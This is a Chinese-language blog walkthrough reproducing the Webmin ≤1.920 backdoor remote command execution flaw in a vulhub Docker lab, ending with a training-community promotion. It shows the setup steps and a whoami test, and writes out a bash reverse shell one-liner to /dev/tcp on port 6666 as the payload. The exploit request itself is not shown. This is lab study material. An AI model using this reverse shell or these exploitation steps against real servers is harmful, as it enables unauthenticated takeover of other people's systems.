漏洞描述
近日webmin被發現存在一處遠程命令執行漏洞,經過分析后,初步猜測其為一次后門植入事件,webmin是目前功能最強大的基于web的unix系統管理工具,管理員通過瀏覽器訪問webmin的各種管理功能并完成相應的管理動作,當用戶開啟webmin密碼重置功能后,攻擊者可以通過發送post請求在目標系統中執行任意命令,且無需身份驗證。
影響范圍:webmin <=1.920
漏洞復現
進入到vuhub之后,就直接執行Docker-compose up -d拉取鏡像搭建
搭建好之后,直接訪問192.168.1.1:10000 但是vuhub搭建的網站它是有問題的,所以要根據它報錯的提示去修改相當, 所以這里的話,就需要用https去訪問,不然會不給訪問:https://192.168.1.1:10000/
接著就是我們的漏洞利用,訪問https://192.168.67.135:10000/password_change.cgi,這樣的話,去訪問它是會報錯的,所以這里我們需要去修改一下配置文件。
接著就是進入后臺修改配置文件,這里的話,就直接用docker exec it id號 /bin/bash
進入到/etc/webmin目錄下,查看config文件。我們要修改的內容是config中的referers_one=1這個配置。
但是在docker容器中,它是沒有編輯器的,所以這里的話,我們需要安裝一個vim編輯器
cat /etc/os-release先進入容器查看發行版,確定使用yum還是apt安裝工具
可以看到使用的debian8的操作系統,接下來apt安裝, apt install vim
接著就是編輯這個文件config,然后將referers_one=1改為referers_one=0
接著再去訪問那個路徑就可以看見,我們這邊的頁面也發生了相對應的變換,它已經不報錯了。
那么接下來的話,就是利用poc復現漏洞,這里的話,要訪問https://192.168.1.1:10000/password_change.cgi并且用burp抓包
使用網上的poc懟,看到成功執行命令
poc如下
之后看見效果,很明顯的成功執行了命令。
執行一個whoami,它這里也成功的輸出相對應的權限
那么我們就要反彈shell,由于它這里可以執行執行命令,那么我們就可以直接執行bash -c "bash -i >& /dev/tcp/192.168.1.1/6666 0>&1" 接收shell服務器的6666端口)
那么的話,執行這個命令,那么我們服務器那邊就要監聽6666,接收反彈回來的shell。 這里的話,需要將payload進一方面的url編碼再去執行
服務器那邊監聽6666端口接收反彈回來的shell可以看見我們執行的payload,右邊的頁面一片空白,就說明成功了。
然后就可以看見成功的反彈了一個shell過來了。
最后喜歡我文章的朋友請加圈子關注我們,私信關鍵詞:學習。(送免費資料和優惠券)
就會自動分享給你微信號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網絡安全技能一直是我們的初衷和愿景,讓我們共同成為守護信息世界的"SaFeMAN"。
還有可以關注我們微信公眾號,在公眾號上輸入安界網,就可以關注到我們,領取資料和優惠券!